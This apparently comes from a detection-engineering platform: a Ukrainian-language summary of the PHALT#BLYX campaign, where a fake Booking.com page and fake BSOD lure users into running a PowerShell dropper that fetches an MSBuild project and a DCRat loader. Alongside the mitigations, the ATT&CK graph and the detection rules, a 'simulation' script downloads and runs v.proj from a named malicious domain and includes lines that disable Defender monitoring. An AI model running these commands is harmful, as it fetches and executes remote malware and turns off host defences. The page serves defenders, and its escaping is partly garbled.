Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт деталізує багатоступеневий ланцюг вторгнення, що впливає на сектор гостинності, поєднуючи підроблену сторінку Booking.com, оманливу анімацію в стилі синього екрану та підказку у стилі ClickFix для тих, щоб переконати користувачів виконати PowerShell dropper. Цей dropper отримує файл проекту MSBuild, який запускає спеціальний завантажувач DCRat. Завантажувач змінює налаштування Windows Defender, встановлює стійкість за допомогою ярлика Startup .url і інжектує своє навантаження в легітимні процеси. Використовуючи інструменти, що містяться у системі, такі як PowerShell і MSBuild.exe, операції зменшують очевидні сліди шкідливого програмного забезпечення. Артефакти російської мови в ланцюзі також відзначені як натяк на авторів.
Розслідування
Дослідники Securonix відстежили потік від фішинг-електронних листів, які пропонують посилання на «скасування бронювання» на шкідливий домен, потім на однорядкову команду PowerShell, яка знаходить msbuild.exe, завантажує файл v.proj і виконує його. Проект v.proj виконує декілька дій: додає виключення для Windows Defender, завантажує staxs.exe (варіант DCRat), створює вказівний ярлик Startup .url для стійкості та підключається до інфраструктури командування та контролю через порт 3535. Завантажувач потім стискає та інжектує фінальну стадію в aspnet_compiler.exe, використовуючи метод hollowing для потоку нормальної діяльності.
Пом’якшення наслідків
Зменшіть вплив, навчаючи користувачів розпізнавати підказки у стилі ClickFix та соціальну інженерію «запустіть цю команду для виправлення». Моніторте та обмежуйте виконання MSBuild.exe, особливо коли виконується з незвичних шляхів або користувацьких робочих процесів, і увімкніть журналювання блоків скриптів PowerShell для кращої видимості. Додайте виявлення для створення ярликів .url в папці Startup та для змін у виключеннях Windows Defender. На мережевому рівні заблокуйте вихідний трафік на визначені шкідливі домени та явно обмежте або попереджайте про підозрілі виходи на TCP/3535, де це не потрібно.
Відповідь
Якщо активність виявлена, ізолюйте хост і збережіть ключові артефакти, включаючи v.proj, staxs.exe та будь-які файли Startup .url. Видаліть неавторизовані виключення Defender, припиніть шкідливі чи інжектовані процеси та заблокуйте пов’язані домени/IP C2 — особливо будь-яке спілкування через порт 3535. Скиньте потенційно скомпрометовані облікові дані, виконайте повне сканування на наявність шкідливих програм та перевірте середовище на аналогічні схеми виконання через MSBuild та команди PowerShell. Нарешті, розгорніть виявлення, інформовані загрозами, що зосереджені на зловживанні MSBuild, поведінці ClickFix та стійкості через ярлики Startup для запобігання рецидивам.
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef file fill:#e6e6e6 classDef folder fill:#d9ead3 %% Nodes u2013 Actions action_phishing[“<b>Дія</b> – <b>T1566.002 Фішинг з використанням спам-посилання</b><br /><b>Опис</b>: Жертва отримує електронний лист, який виглядає як від Booking.com, і натискає на шкідливе посилання на фальшувий сайт бронювання.”] class action_phishing action action_user_execution[“<b>Дія</b> – <b>T1204.001 Виконання користувачем</b> & <b>T1204.004 Шкідливе копіювання-вставка</b><br /><b>Опис</b>: Фальшивий сайт показує сторінку, схожу на BSOD, яка вказує користувачу вставити PowerShell команду у діалогове вікно Виконати.”] class action_user_execution action action_defense_evasion_exclusions[“<b>Дія</b> – <b>T1562 Зниження захисту</b> & <b>T1564.012 Винятки файлів/шляхів</b><br /><b>Опис</b>: Скрипт v.proj додає винятки для Windows Defender для ProgramData та загальних розширень виконуваних файлів.”] class action_defense_evasion_exclusions action action_persistence_shortcut[“<b>Дія</b> – <b>T1547.009 Модифікація ярликів</b><br /><b>Опис</b>: Створює ярлик Інтернет (.url) у папці автозапуску користувача, який вказує на завантажений виконуваний файл.”] class action_persistence_shortcut action action_process_hollowing[“<b>Дія</b> – <b>T1055.012 Заповнення процесів</b><br /><b>Опис</b>: Впорскує кінцевий DCRat навантажувач у aspnet_compiler.exe, використовуючи заповнення процесів.”] class action_process_hollowing action action_reflective_loading[“<b>Дія</b> – <b>T1620 Відбиткове завантаження коду</b><br /><b>Опис</b>: Завантажує додаткові DLL-навантаження при відбитковому завантаженні через Assembly.Load.”] class action_reflective_loading action action_c2_nonstandard_port[“<b>Дія</b> – <b>T1571 Несандартний порт</b><br /><b>Опис</b>: RAT спілкується з C2-серверами через TCP порт 3535.”] class action_c2_nonstandard_port action action_c2_dynamic_resolution[“<b>Дія</b> – <b>T1568 Динамічний резолюшен</b><br /><b>Опис</b>: Розв’язує кілька C2-доменів (наприклад, asj77.com) під час виконання.”] class action_c2_dynamic_resolution action action_obfuscation[“<b>Дія</b> – <b>T1027.005 Обфусцовані файли або інформація</b><br /><b>Опис</b>: Навантаження сильно обфусцовані та упаковані, щоб уникнути статичного виявлення.”] class action_obfuscation action %% Nodes u2013 Tools tool_powershell[“<b>Інструмент</b> – <b>T1059.001 PowerShell</b><br /><b>Опис</b>: Виконує шкідливу команду, яка завантажує файл проекту MSBuild.”] class tool_powershell tool tool_msbuild[“<b>Інструмент</b> – <b>T1127.001 MSBuild</b><br /><b>Опис</b>: Надійний інструмент розробника, який використовується для компіляції та виконання шкідливого файлу v.proj.”] class tool_msbuild tool tool_aspnet_compiler[“<b>Інструмент</b> – aspnet_compiler.exe<br /><b>Опис</b>: Законний компілятор .NET, націлений для заповнення процесів.”] class tool_aspnet_compiler process %% Nodes u2013 Malware / Files malware_vproj[“<b>Шкідливе ПЗ</b> – v.proj (шкідливий проект MSBuild)<br /><b>Опис</b>: Завантажується PowerShell, компілюється MSBuild, додає виключення для захисника і скидає навантаження.”] class malware_vproj malware malware_dcrat[“<b>Шкідливе ПЗ</b> – DCRat навантаження<br /><b>Опис</b>: Фінальний троян віддаленого доступу, впорсканий в aspnet_compiler.exe.”] class malware_dcrat malware file_shortcut[“<b>Файл</b> – Ярлик автозапуску (.url)<br /><b>Опис</b>: Вказує на скинутий виконуваний файл DCRat і забезпечує автозапуск під час входу.”] class file_shortcut file folder_startup[“<b>Папка</b> – Директорія автозапуску<br /><b>Опис</b>: Містить шкідливий ярлик, який забезпечує постійність.”] class folder_startup folder file_dcrat_exe[“<b>Файл</b> – Скинутий виконуваний файл DCRat<br /><b>Опис</b>: Виконується після активації ярлика.”] class file_dcrat_exe file dll_payloads[“<b>Файл</b> – Додаткові DLL-навантаження<br /><b>Опис</b>: Завантажується при відбитковому завантаженні DCRat навантаженням.”] class dll_payloads file port_3535[“<b>Мережа</b> – TCP порт 3535<br /><b>Опис</b>: Використовується для зв’язку з C2.”] class port_3535 file domain_asj77[“<b>Мережа</b> – asj77.com (C2-домен)<br /><b>Опис</b>: Розв’язується під час виконання для командування і контролю.”] class domain_asj77 file %% Connections u2013 Flow action_phishing u002du002d>|веде до| action_user_execution action_user_execution u002du002d>|виконує| tool_powershell tool_powershell u002du002d>|завантажує| malware_vproj malware_vproj u002du002d>|компільовано| tool_msbuild tool_msbuild u002du002d>|виконує| malware_vproj malware_vproj u002du002d>|додає| action_defense_evasion_exclusions action_defense_evasion_exclusions u002du002d>|створює| file_shortcut file_shortcut u002du002d>|розміщено в| folder_startup folder_startup u002du002d>|завантажує| file_dcrat_exe malware_vproj u002du002d>|скидає| file_dcrat_exe file_dcrat_exe u002du002d>|запускає| malware_dcrat malware_dcrat u002du002d>|впорскується в| tool_aspnet_compiler tool_aspnet_compiler u002du002d>|заповнено| malware_dcrat malware_dcrat u002du002d>|завантажує при відбитковому завантаженні| dll_payloads malware_dcrat u002du002d>|спілкується через| action_c2_nonstandard_port action_c2_nonstandard_port u002du002d>|використовує| port_3535 malware_dcrat u002du002d>|використовує динамічний резолюшен| action_c2_dynamic_resolution action_c2_dynamic_resolution u002du002d>|розв’язує до| domain_asj77 malware_dcrat u002du002d>|обфусцовано| action_obfuscation “
Потік атаки
Виявлення
Завантаження або Передача через Powershell (через командний рядок)
Переглянути
Підозрілі зміни налаштувань Windows Defender (через powershell)
Переглянути
Можливі точки стійкості [ASEPs – Реєстр програмного забезпечення/NTUSER Hive] (через подію реєстру)
Переглянути
Підозрілі бінарні/скрипти у локації автозапуску (через подію файлу)
Переглянути
IOC (HashSha512) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (SourceIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (HashSha256) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (DestinationIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
PHALT#BLYX Виконання зловмисного ПЗ через MSBuild та Hollowing процесів [Створення процесу Windows]
Переглянути
PHALT#BLYX Кампанія шкідливого ПЗ за допомогою PowerShell та MSBuild для зараження [Powershell Windows]
Переглянути
Імітаційне виконання
Передумова: Перевірка телеметрії та базової лінії повинна бути успішною.
Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), призначене для тригера правил виявлення. Команди і наратив прямо відображують ідентифіковані TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення.
-
Опис атаки та команди:
Актор загрози відкриває сесію PowerShell на зараженій кінцевій точці. Спочатку знаходятьmsbuild.exe, потім завантажують зловмисний проект MSBuild (v.proj) доC:ProgramData. Зловмисник негайно викликаєmsbuild.exeдля виконання навантаження, яке скидає другий етап. Нарешті, вони змінюють налаштування Windows Defender, додаючи виключення і відключаючи моніторинг у реальному часі для забезпечення стійкості. -
Скрипт регресійного тестування:
# Скрипт симуляції PHALT#BLYX – відтворює активність, яка викликає тригер виявлення # -------------------------------------------------------------- # 1. Знаходження msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Завантаження зловмисного проекту MSBuild до ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Виконання проекту з msbuild.exe & $msb $dest # 4. Зміна налаштувань Windows Defender (будь-яка з нижчезазначених буде задовольняти правило) # Розкоментуйте потрібні рядки для симуляції дій зловмисника. # Додати шлях до виключення # Add-MpPreference -ExclusionPath "$env:ProgramData" # Додати виключення для .exe файлів # Add-MpPreference -ExclusionExtension ".exe" # Додати виключення для .ps1 файлів # Add-MpPreference -ExclusionExtension ".ps1" # Вимкнути моніторинг у реальному часі # Set-MpPreference -DisableRealtimeMonitoring $true -
Команди прибирання:
# Видалити завантажений файл проекту Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Відновити моніторинг у реальному часі Windows Defender (якщо він був вимкнений) Set-MpPreference -DisableRealtimeMonitoring $false # Видалити будь-які додані виключення (приклад для виключення шляхів) Remove-MpPreference -ExclusionPath "$env:ProgramData" # За бажанням видалити всі залишкові файли, створені навантаженням # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue